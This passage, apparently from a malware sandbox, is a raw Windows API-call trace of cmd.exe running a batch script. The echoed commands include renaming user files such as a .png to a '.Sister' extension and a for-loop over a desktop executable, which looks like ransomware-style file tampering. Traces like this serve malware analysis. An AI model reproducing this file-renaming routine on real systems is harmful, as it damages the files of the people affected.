nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0293.581] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.581] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.581] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0293.581] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.581] GetFileType (hFile=0x50) returned 0x2 [0293.581] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.581] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0293.582] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.582] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x19) returned 1 [0293.582] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.582] GetFileType (hFile=0x50) returned 0x2 [0293.583] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.583] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0293.584] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.584] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed92e11b0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed92e11b0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0293.585] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0293.585] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.585] GetFileType (hFile=0x50) returned 0x2 [0293.585] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.585] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0293.585] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.585] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0293.592] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0293.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.592] GetFileType (hFile=0x50) returned 0x2 [0293.592] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.592] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0293.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.593] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0293.599] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.600] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.600] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.600] malloc (_Size=0xffce) returned 0x21ed98bfa00 [0293.600] ??_V@YAXPEAX@Z () returned 0x21ed98bfa00 [0293.600] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.600] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.600] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.600] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.600] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.600] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.600] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.600] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.600] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.600] ??_V@YAXPEAX@Z () returned 0x1 [0293.600] GetProcessHeap () returned 0x21ed8c70000 [0293.600] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f000 [0293.601] GetProcessHeap () returned 0x21ed8c70000 [0293.601] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f000, Size=0x130) returned 0x21ed8d576e0 [0293.601] GetProcessHeap () returned 0x21ed8c70000 [0293.601] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d576e0) returned 0x130 [0293.601] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.601] malloc (_Size=0xffce) returned 0x21ed98bfa00 [0293.601] ??_V@YAXPEAX@Z () returned 0x21ed98bfa00 [0293.601] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.601] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed98bfa00, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0293.603] ??_V@YAXPEAX@Z () returned 0x1 [0293.603] GetProcessHeap () returned 0x21ed8c70000 [0293.603] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d57460 [0293.603] GetProcessHeap () returned 0x21ed8c70000 [0293.603] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5eda0 [0293.603] GetProcessHeap () returned 0x21ed8c70000 [0293.603] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5eda0, Size=0x130) returned 0x21ed8d57be0 [0293.603] GetProcessHeap () returned 0x21ed8c70000 [0293.603] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d57be0) returned 0x130 [0293.603] malloc (_Size=0xffce) returned 0x21ed98bfa00 [0293.603] ??_V@YAXPEAX@Z () returned 0x21ed98bfa00 [0293.603] GetProcessHeap () returned 0x21ed8c70000 [0293.603] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7960 [0293.603] GetProcessHeap () returned 0x21ed8c70000 [0293.603] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5cd80 [0293.604] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0293.604] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0293.604] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.604] GetLastError () returned 0x2 [0293.604] GetProcessHeap () returned 0x21ed8c70000 [0293.604] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92e1680 [0293.604] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92e1690 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.604] SetErrorMode (uMode=0x0) returned 0x0 [0293.604] SetErrorMode (uMode=0x1) returned 0x0 [0293.604] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed98bfa00, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0293.604] SetErrorMode (uMode=0x0) returned 0x1 [0293.604] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0293.604] GetProcessHeap () returned 0x21ed8c70000 [0293.604] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5bc70 [0293.605] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0293.605] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0293.605] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.605] GetLastError () returned 0x2 [0293.605] ??_V@YAXPEAX@Z () returned 0x1 [0293.605] malloc (_Size=0xffce) returned 0x21ed98bfa00 [0293.605] ??_V@YAXPEAX@Z () returned 0x21ed98bfa00 [0293.605] malloc (_Size=0xffce) returned 0x21ed98cf9e0 [0293.605] ??_V@YAXPEAX@Z () returned 0x21ed98cf9e0 [0293.605] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.605] GetLastError () returned 0x2 [0293.605] _get_osfhandle (_FileHandle=2) returned 0x54 [0293.605] GetFileType (hFile=0x54) returned 0x2 [0293.606] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0293.606] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0293.607] _get_osfhandle (_FileHandle=2) returned 0x54 [0293.607] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0293.607] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0293.607] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0293.607] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0293.615] longjmp () [0293.615] ??_V@YAXPEAX@Z () returned 0x1 [0293.615] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x886ca6b0, ftCreationTime.dwHighDateTime=0x1d5eede, ftLastAccessTime.dwLowDateTime=0xf339feb0, ftLastAccessTime.dwHighDateTime=0x1d5e999, ftLastWriteTime.dwLowDateTime=0xf339feb0, ftLastWriteTime.dwHighDateTime=0x1d5e999, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="K_-pi9uGGut2N", cAlternateFileName="")) returned 1 [0293.615] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17cf8d10, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0xbb62ea60, ftLastAccessTime.dwHighDateTime=0x1d5eac0, ftLastWriteTime.dwLowDateTime=0xbb62ea60, ftLastWriteTime.dwHighDateTime=0x1d5eac0, nFileSizeHigh=0x0, nFileSizeLow=0x1770f, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="lrXVOGLmm_sYY.png", cAlternateFileName="")) returned 1 [0293.615] GetProcessHeap () returned 0x21ed8c70000 [0293.615] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c72790, Size=0x15c) returned 0x21ed8c72790 [0293.615] GetProcessHeap () returned 0x21ed8c70000 [0293.615] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c72790) returned 0x15c [0293.615] GetProcessHeap () returned 0x21ed8c70000 [0293.615] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92f1670 [0293.616] GetProcessHeap () returned 0x21ed8c70000 [0293.616] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92f1670, Size=0x30) returned 0x21ed92f1670 [0293.616] GetProcessHeap () returned 0x21ed8c70000 [0293.616] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92f1670) returned 0x30 [0293.616] GetProcessHeap () returned 0x21ed8c70000 [0293.616] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92f16b0 [0293.616] malloc (_Size=0x1ff9c) returned 0x21ed98df9c0 [0293.617] GetProcessHeap () returned 0x21ed8c70000 [0293.617] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc8610 [0293.617] ??_V@YAXPEAX@Z () returned 0x1 [0293.617] GetProcessHeap () returned 0x21ed8c70000 [0293.617] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92f16b0, Size=0x190) returned 0x21ed92f16b0 [0293.617] GetProcessHeap () returned 0x21ed8c70000 [0293.617] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92f16b0) returned 0x190 [0293.617] GetProcessHeap () returned 0x21ed8c70000 [0293.617] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92f1850 [0293.617] GetProcessHeap () returned 0x21ed8c70000 [0293.617] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92f1850, Size=0x290) returned 0x21ed92f1850 [0293.617] GetProcessHeap () returned 0x21ed8c70000 [0293.618] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92f1850) returned 0x290 [0293.618] GetProcessHeap () returned 0x21ed8c70000 [0293.618] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92f1af0 [0293.618] GetProcessHeap () returned 0x21ed8c70000 [0293.618] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92f1af0, Size=0x30) returned 0x21ed92f1af0 [0293.618] GetProcessHeap () returned 0x21ed8c70000 [0293.618] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92f1af0) returned 0x30 [0293.618] GetProcessHeap () returned 0x21ed8c70000 [0293.618] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92f1b30 [0293.618] malloc (_Size=0x1ff9c) returned 0x21ed98df9c0 [0293.618] GetProcessHeap () returned 0x21ed8c70000 [0293.618] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc8b50 [0293.618] ??_V@YAXPEAX@Z () returned 0x1 [0293.618] malloc (_Size=0x1ff9c) returned 0x21ed98df9c0 [0293.618] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7c00 [0293.619] FindClose (in: hFindFile=0x21ed8cc7c00 | out: hFindFile=0x21ed8cc7c00) returned 1 [0293.619] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7d20 [0293.620] FindClose (in: hFindFile=0x21ed8cc7d20 | out: hFindFile=0x21ed8cc7d20) returned 1 [0293.620] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd996ca37, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd996ca37, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8cc8020 [0293.620] FindClose (in: hFindFile=0x21ed8cc8020 | out: hFindFile=0x21ed8cc8020) returned 1 [0293.620] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\lrXVOGLmm_sYY.png", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17cf8d10, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0xbb62ea60, ftLastAccessTime.dwHighDateTime=0x1d5eac0, ftLastWriteTime.dwLowDateTime=0xbb62ea60, ftLastWriteTime.dwHighDateTime=0x1d5eac0, nFileSizeHigh=0x0, nFileSizeLow=0x1770f, dwReserved0=0x4, dwReserved1=0x7, cFileName="lrXVOGLmm_sYY.png", cAlternateFileName="LRXVOG~1.PNG")) returned 0x21ed8cc79c0 [0293.620] FindClose (in: hFindFile=0x21ed8cc79c0 | out: hFindFile=0x21ed8cc79c0) returned 1 [0293.620] _wcsnicmp (_String1="LRXVOG~1.PNG", _String2="lrXVOGLmm_sYY.png", _MaxCount=0x11) returned 18 [0293.620] malloc (_Size=0x1ff9c) returned 0x21ed98ff970 [0293.622] ??_V@YAXPEAX@Z () returned 0x21ed98ff970 [0293.623] GetProcessHeap () returned 0x21ed8c70000 [0293.623] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2c) returned 0x21ed8cc8a50 [0293.623] ??_V@YAXPEAX@Z () returned 0x1 [0293.623] ??_V@YAXPEAX@Z () returned 0x1 [0293.623] GetProcessHeap () returned 0x21ed8c70000 [0293.623] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92f1b30, Size=0x190) returned 0x21ed92f1b30 [0293.623] GetProcessHeap () returned 0x21ed8c70000 [0293.623] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92f1b30) returned 0x190 [0293.623] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0293.623] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.624] GetFileType (hFile=0x50) returned 0x2 [0293.624] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.624] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0293.624] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.625] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0293.631] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.631] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.631] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0293.631] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.632] GetFileType (hFile=0x50) returned 0x2 [0293.632] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.632] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0293.632] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.632] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0293.633] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.633] GetFileType (hFile=0x50) returned 0x2 [0293.633] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.633] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.633] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.633] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed92f1680*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed92f1680*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.634] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"lrXVOGLmm_sYY.png\" \"lrXVOGLmm_sYY.png.Sister\" ") returned 48 [0293.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.634] GetFileType (hFile=0x50) returned 0x2 [0293.634] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.634] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.634] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x30, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x30) returned 1 [0293.635] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0293.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.635] GetFileType (hFile=0x50) returned 0x2 [0293.635] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.635] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.636] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.636] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0293.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.636] GetFileType (hFile=0x50) returned 0x2 [0293.636] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.637] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.637] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0293.638] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0293.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.638] GetFileType (hFile=0x50) returned 0x2 [0293.638] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.638] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.638] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0293.639] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0293.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.639] GetFileType (hFile=0x50) returned 0x2 [0293.639] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.639] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.640] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0293.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.645] GetFileType (hFile=0x50) returned 